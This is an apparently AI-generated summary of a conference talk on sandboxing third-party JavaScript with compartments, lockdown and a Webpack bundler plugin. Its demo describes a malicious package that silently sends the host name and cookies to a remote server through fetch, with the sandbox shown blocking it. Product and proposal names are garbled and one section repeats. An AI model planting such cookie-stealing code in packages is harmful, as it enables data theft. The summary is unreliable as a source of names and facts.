I Run Code From the Internet!
AI Generated Video Summary
1. Running Someone Else's Code and Ensuring Security
And then there's lockdown which makes sure that the entire environment around it, like global prototypes of object, array, and function, is put in a state where it's impossible to maliciously fiddle with them. So, no prototype pollution anymore.
And the good news is, this is becoming part of language. Well, not yet! There's an early proposal for introducing compartments in TC39, and some of the people working on it are the people responsible for giving us used strict object frees or promises. So, I'm hoping this gets in. It's going to take a while, but we already have an implementation that works.
3. LavaMode and Bundler
LavaMode is not just for Node. There's also a bundler built on the same technology and ideas, using the same structure for policy. The current bundler for Manumaskian production is Browserify-based, but we're working on a Webpack plugin. It's a work in progress and open source. Join us if you want to help out. There are still details to figure out for perfect coverage of all Webpack features.
And LavaMode is not just for Node. We're not at a Node-specific conference. There's also a bundler built on the same technology, on the same ideas, using the same structure for policy. And the bundler that we have working for Manumaskian production today is Browserify-based, because Browserify was the most flexible one of the bundlers. And that's been working for about two years now, if I recall correctly. And now we're working on getting a Webpack plugin. This is a work in progress and this is open source. So if you want to help out, please join us. There's a bunch of details about Webpack that we still need to figure out to have perfect coverage of all Webpack features. And there's a lot of Webpack features. So let me show you the Bundler now.
4. Application, Cookie Monster, and Lavamote
This is an application, a very simple one, where it can import things, MJS, TypeScript, old packages, everything. And there is a package called cookiemonster that I made. And cookiemonster is giving us a random quote. And there is some environment available. Why am I showing you this? Because cookiemonster is not only giving us quotes. It's also stealing our cookies. So here's a fetch that sends our host name and cookie to the cookiemonster server.
This app is being built with webpack. There is nothing special about this configuration. It's super simple. And then this plugin. The codename for our LavaMode plugin is Scoretrap. Still a work in progress. Remember? And I have here examples of two builds. Let's run the build without Scoretrap first. So if I refresh this page, I'm going to get a message sent to my server. This is a popup from my server. It has the chocolate chip name in the cookies. This is the fetch that happened and this is the application working. We get the quote from Cookie Monster but at what price? In here, this is a build where our plugin was enabled. If I run this, I get undefined instead. What happened here is that I have some diagnostics output. We've been looking at policies for app, leftpad and Cookie Monster. So the app has access to everything. Cookie Monster still gives us quotes. But it doesn't have access to location and document, because we didn't give it that access. This is for now implemented here in the runtime. I temporarily added these hardcoded, the policy in here. Policy for the runtime for webpack is yet to be implemented but Cookie Monster is only getting fetch, leftpad is getting nothing and then app is getting pretty much everything. And that's the policy set right now.